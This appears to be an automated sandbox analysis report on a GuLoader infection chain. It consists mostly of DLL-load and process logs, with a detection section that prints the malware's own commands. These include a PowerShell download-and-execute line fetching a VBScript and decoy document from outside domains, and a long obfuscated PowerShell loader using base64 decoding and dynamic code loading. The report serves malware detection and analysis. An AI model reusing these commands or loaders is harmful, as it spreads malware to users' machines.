                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: pqg5u7vt.LNK.13.drLNK file: ..\..\..\..\..\..\Public\pqg5u7vt.doc
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
                        Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: stem.Core.pdbC source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2321624804.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000013.00000003.2322952363.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323279955.0000000022F80000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000013.00000003.2323829000.0000000022F00000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2323638881.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2326506772.0000000023000000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 0000000B.00000002.2154114579.0000000002F00000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000B.00000002.2200996069.00000000076EC000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell").Run "powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'", 0IWshShell3.Run("powershell.exe -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url", "0")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 0000000B.00000002.2214810117.000000000B9FD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2187855204.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hylernes)$glOBAl:CUarterOn = [SySTeM.TEXT.encOding]::ascii.GEtString($TEInt)$GLoBaL:UNDeVeLOpaBLe=$CUaRTEROn.suBstring($AFfIXaL,$UNaTTRibutiVE)<#Airbags Lamebrains Nilens Satyriskes
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Unibracteolate $Nonfamilies $Kartoffelkuren249), (vurderingsformen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Omstningerne = [AppDomain]::CurrentDomai
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Krekortets26)), $Renskrivningersarderedes).DefineDynamicModule($Indefaceable, $false).DefineType($Gbakkes43, $Shamponerendes88, [Syste
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Hylernes)$glOBAl:CUarterOn = [SySTeM.TEXT.encOding]::ascii.GEtString($TEInt)$GLoBaL:UNDeVeLOpaBLe=$CUaRTEROn.suBstring($AFfIXaL,$UNaTTRibutiVE)<#Airbags Lamebrains Nilens Satyriskes
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- R
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB 